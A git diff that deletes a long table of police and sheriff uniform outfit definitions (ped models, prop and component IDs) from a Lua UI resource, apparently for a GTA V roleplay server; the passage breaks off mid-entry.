diff --git a/resources/eup-ui/eup_ui.lua b/resources/eup-ui/eup_ui.lua index 411d191de..39ba6eb76 100644 --- a/resources/eup-ui/eup_ui.lua +++ b/resources/eup-ui/eup_ui.lua @@ -1,10817 +1,91 @@ -local outfits = { - ['Male LSPD Class A'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 53, 1 }, - } - }, - ['Male LSPD Class B'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 53, 1 }, - } - }, - ['Male LSPD Class C'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 4, 1 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 53, 1 }, - } - }, - ['Female LSPD Class A'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 1 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 53, 1 }, - } - }, - ['Female LSPD Class B'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 1 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 53, 1 }, - } - }, - ['Female LSPD Class C'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 53, 1 }, - } - }, - ['Male LSPD Jacket'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 40, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 67, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 3, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSPD Jacket'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 173, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 47, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 3, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSPD Winter Uniform'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 155, 1 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 29, 1 }, - { 5, 1, 1 }, - } - }, - ['Female LSPD Winter Uniform'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 46, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 152, 1 }, - { 3, 37, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 31, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSPD Raincoat'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 7 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 190, 7 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 32, 1 }, - { 5, 53, 1 }, - } - }, - ['Female LSPD Raincoat'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 192, 7 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 36, 1 }, - { 5, 1, 1 }, - } - }, - ['Male LSPD Motor Unit Class A'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 2 }, - { 3, 21, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 33, 2 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 53, 1 }, - } - }, - ['Male LSPD Motor Unit Class B'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 2 }, - { 3, 21, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 33, 2 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 53, 1 }, - } - }, - ['Male LSPD Motor Unit Class C'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 2 }, - { 3, 20, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 33, 2 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 53, 1 }, - } - }, - ['Female LSPD Motor Unit Class A'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 2 }, - { 3, 24, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 32, 2 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 53, 1 }, - } - }, - ['Female LSPD Motor Unit Class B'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 2 }, - { 3, 24, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 32, 2 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 53, 1 }, - } - }, - ['Female LSPD Motor Unit Class C'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 2 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 32, 2 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 53, 1 }, - } - }, - ['Male LSPD Bicycle Uniform'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 50, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 94, 3 }, - { 3, 20, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 13, 3 }, - { 6, 3, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSPD Bicycle Uniform'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 48, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 85, 3 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 15, 3 }, - { 6, 11, 1 }, - { 7, 9, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSPD Suit'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 5, 5 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 11, 1 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 39, 6 }, - { 9, 25, 1 }, - { 5, 67, 1 }, - } - }, - ['Female LSPD Suit'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 25, 2 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 65, 2 }, - { 4, 4, 4 }, - { 6, 30, 1 }, - { 7, 1, 1 }, - { 9, 27, 1 }, - { 5, 67, 1 }, - } - }, - ['Male LSPD Detective'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 13, 1 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 13, 6 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 25, 1 }, - { 5, 1, 1 }, - } - }, - ['Female LSPD Detective'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 29, 3 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 25, 6 }, - { 4, 4, 4 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 27, 1 }, - { 5, 1, 1 }, - } - }, - ['Male LSPD Detective (Vest)'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 4, 1 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 132, 1 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 25, 1 }, - { 5, 1, 1 }, - } - }, - ['Female LSPD Detective (Vest)'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 28, 6 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 162, 1 }, - { 4, 4, 4 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 27, 1 }, - { 5, 1, 1 }, - } - }, - ['Male LSPD Windbreaker'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 37, 2 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 12, 1 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 25, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSPD Windbreaker'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 169, 2 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 4 }, - { 4, 4, 4 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 10, 1 }, - { 5, 60, 1 }, - } - }, - ['Male LSPD Detective Winter'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 39, 1 }, - { 3, 34, 1 }, - { 10, 1, 1 }, - { 8, 11, 1 }, - { 4, 11, 5 }, - { 6, 26, 1 }, - { 7, 39, 6 }, - { 9, 25, 1 }, - { 5, 67, 1 }, - } - }, - ['Female LSPD Detective Winter'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 241, 2 }, - { 3, 45, 1 }, - { 10, 1, 1 }, - { 8, 78, 6 }, - { 4, 4, 4 }, - { 6, 26, 1 }, - { 7, 1, 1 }, - { 9, 27, 1 }, - { 5, 67, 1 }, - } - }, - ['Male LSPD Task Force'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 209, 2 }, - { 3, 31, 1 }, - { 10, 1, 1 }, - { 8, 114, 1 }, - { 4, 1, 1 }, - { 6, 52, 1 }, - { 7, 2, 1 }, - { 9, 8, 1 }, - { 5, 67, 1 }, - } - }, - ['Female LSPD Task Force'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 85, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 80, 1 }, - { 4, 52, 5 }, - { 6, 56, 1 }, - { 7, 2, 1 }, - { 9, 8, 1 }, - { 5, 67, 1 }, - } - }, - ['Male LSPD K-9 Class B'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 102, 1 }, - { 3, 5, 1 }, - { 10, 13, 1 }, - { 8, 38, 1 }, - { 4, 88, 3 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 15, 1 }, - { 5, 75, 1 }, - } - }, - ['Male LSPD K-9 Class C'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 103, 1 }, - { 3, 1, 1 }, - { 10, 16, 1 }, - { 8, 38, 1 }, - { 4, 88, 3 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 15, 1 }, - { 5, 75, 1 }, - } - }, - ['Female LSPD K-9 Class B'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 93, 1 }, - { 3, 4, 1 }, - { 10, 12, 1 }, - { 8, 3, 1 }, - { 4, 91, 3 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 75, 1 }, - } - }, - ['Female LSPD K-9 Class C'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 94, 1 }, - { 3, 15, 1 }, - { 10, 15, 1 }, - { 8, 3, 1 }, - { 4, 91, 3 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 75, 1 }, - } - }, - ['Male LSPD Dirtbike patrol'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 17, 1 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 153, 1 }, - { 3, 18, 1 }, - { 10, 1, 1 }, - { 8, 56, 1 }, - { 4, 68, 12 }, - { 6, 48, 4 }, - { 7, 2, 1 }, - { 9, 13, 4 }, - { 5, 49, 1 }, - } - }, - ['Female LSPD Dirtbike Unit'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 17, 1 }, - { 1, 28, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 150, 1 }, - { 3, 19, 1 }, - { 10, 1, 1 }, - { 8, 33, 1 }, - { 4, 70, 12 }, - { 6, 49, 4 }, - { 7, 2, 1 }, - { 9, 12, 4 }, - { 5, 49, 1 }, - } - }, - ['Male LSPD Riot Gear'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 126, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 1 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 13, 4 }, - { 5, 53, 1 }, - } - }, - ['Female LSPD Riot Gear'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 125, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 1 }, - { 3, 40, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 12, 4 }, - { 5, 53, 1 }, - } - }, - ['Male LSPD SWAT Uniform'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 76, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 53, 1 }, - { 11, 50, 1 }, - { 3, 97, 1 }, - { 10, 4, 1 }, - { 8, 16, 1 }, - { 4, 32, 1 }, - { 6, 26, 1 }, - { 7, 111, 1 }, - { 9, 17, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSPD SWAT Uniform'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 75, 1 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 43, 1 }, - { 3, 112, 1 }, - { 10, 4, 1 }, - { 8, 16, 1 }, - { 4, 31, 1 }, - { 6, 26, 1 }, - { 7, 82, 1 }, - { 9, 19, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSPD Pilot Uniform'] = { - category = 'LSPD', - ped = 'mp_m_freemode_01', - props = { - { 0, 80, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 66, 3 }, - { 3, 17, 1 }, - { 10, 9, 1 }, - { 8, 68, 1 }, - { 4, 39, 3 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSPD Pilot Uniform'] = { - category = 'LSPD', - ped = 'mp_f_freemode_01', - props = { - { 0, 79, 2 }, - { 1, 14, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 60, 3 }, - { 3, 18, 1 }, - { 10, 8, 1 }, - { 8, 50, 1 }, - { 4, 39, 3 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSSD Class A'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 14, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 3 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 54, 1 }, - } - }, - ['Male LSSD Class B'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 3 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 54, 1 }, - } - }, - ['Male LSSD Class C'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 3 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 54, 1 }, - } - }, - ['Female LSSD Class A'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 14, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 3 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 54, 1 }, - } - }, - ['Female LSSD Class B'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 3 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 54, 1 }, - } - }, - ['Female LSSD Class C'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 3 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 54, 1 }, - } - }, - ['Male LSSD Jacket'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 157, 5 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 2 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 3, 3 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD Jacket'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 154, 5 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 2 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 3, 3 }, - { 5, 49, 1 }, - } - }, - ['Male LSSD Jacket HI-VIS'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 157, 3 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 2 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 3, 3 }, - { 5, 49, 1 }, - } - }, - ['Male LSSD Winter Uniform'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 18, 2 }, - { 3, 34, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 29, 2 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD Winter Uniform'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 22, 2 }, - { 3, 37, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 29, 2 }, - { 5, 49, 1 }, - } - }, - ['Male LSSD Raincoat'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 190, 8 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 2 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 33, 1 }, - { 5, 54, 1 }, - } - }, - ['Female LSSD Raincoat'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 192, 8 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 2 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 37, 1 }, - { 5, 1, 1 }, - } - }, - ['Male LSSD Motorcycle Class A'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 3 }, - { 3, 21, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 33, 3 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 54, 1 }, - } - }, - ['Male LSSD Motorcycle Class B'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 3 }, - { 3, 21, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 33, 3 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 54, 1 }, - } - }, - ['Male LSSD Motorcycle Class C'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 3 }, - { 3, 20, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 33, 3 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 54, 1 }, - } - }, - ['Female LSSD Motorcycle Class A'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 3 }, - { 3, 24, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 32, 3 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 